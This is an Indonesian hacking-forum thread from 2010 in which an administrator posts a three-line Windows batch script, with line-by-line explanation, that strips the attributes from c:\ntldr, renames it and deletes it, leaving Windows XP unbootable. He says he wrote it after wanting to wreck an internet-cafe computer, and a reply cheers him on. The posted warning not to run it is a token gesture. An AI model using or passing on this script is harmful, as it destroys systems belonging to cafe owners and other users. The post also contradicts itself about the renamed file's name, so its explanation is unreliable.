IndeksSelamat DatangPendaftaranLogin
Forum
September 2018
MonTueWedThuFriSatSun
     12
3456789
10111213141516
17181920212223
24252627282930
CalendarCalendar
Clock

Share | 
 

 Script Simple Tapi Berbahaya

Go down 
PengirimMessage
{A}mazin{K}
Administrator
Administrator
avatar

Jumlah posting : 61
Join date : 25.10.10
Age : 30
Lokasi : Padang

PostSubyek: Script Simple Tapi Berbahaya   Tue Dec 14, 2010 8:34 pm

waktu itu lg d warnet gemes banget ama nih warnet akhirnya aq coba2 deh rusakin comp >.<

eiits tp gk boleh gitu ya ngrusak2 kkwkwk

Part 1 .bat yg jahat

Buka notepad, lalu tulis script di bawah ini, yang warna biru aja, yang item jangan :

attrib –s –h –r c:\ntldr <~ mengubah atribut si ‘ntldr’ menjadi, system=false(-), hidden=false(-), readonly=false(-)
ren c:\ntldr mledukkomplu <~ mengubah nama si ‘ntldr’ menjadi ‘mledukkomplu’
del c:\mledukkomplu <~ karena saya suka ragu, saya hapus pula si mledukkomplu itu (ntldr)



Save dengan ekstensi .bat, Tapi JANGAN DIJALANKAN! BAHAYA!


Kesimpulan :
Script diatas akan mengeset atribut file ‘ntldr’ yang merupakan ‘Jantung’ si windows XP, menjadi –s –h –r [not system, not hidden, not read-only], jadi file akan muncul dan bisa di edit karena ‘read-only’ nya sudah dicopot.

Lalu script ini akan merubah nama si ‘ntldr’ menjadi, ‘udahrusakgan’, nah, di baris ini, ntldr, sudah berubah jadi udahrusakgan, artinya, Jika anda shutdown computer anda, dan menyalakannya lagi, pada saat booting, file NTLDR tidak akan ditemukan karena namanya sudah berubah. Dan si XP akan minta di Reinstall!! Hahahahaha!!

Baris ketiga akan menghapus file ‘ntldr’ dari harddisk anda… wekekekekek…

Hebat kan? Cuma dengan 3 baris script, kita bisa menghabisi computer dengan bahasa yang terdekat, gratis dan mudah dipahami, Batch…

credit maaf saya lupa copy di google ..
barang x berguna hehehe .. part 2 nyusul ye

Kembali Ke Atas Go down
Admin [B0C4H]
Administrator
Administrator
avatar

Jumlah posting : 201
Join date : 19.10.10
Age : 27
Lokasi : Padang

PostSubyek: Re: Script Simple Tapi Berbahaya   Fri Dec 17, 2010 3:00 pm

wew... NICE SHOT bro....

terus....

Lanjutkan OM...

_____________________________________________________________________________
About me klik:
 


KALO BERGUNA TOLONG DI

sundul sundul sundul

ga nolak juga loh di kasih ++

cendol cendol cendol






†F.K.B† TEAM

Kembali Ke Atas Go down
http://padangonly.n-stars.org
 
Script Simple Tapi Berbahaya
Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
 :: F.K.B |Dunia Teknologi :: Komputer-
Navigasi: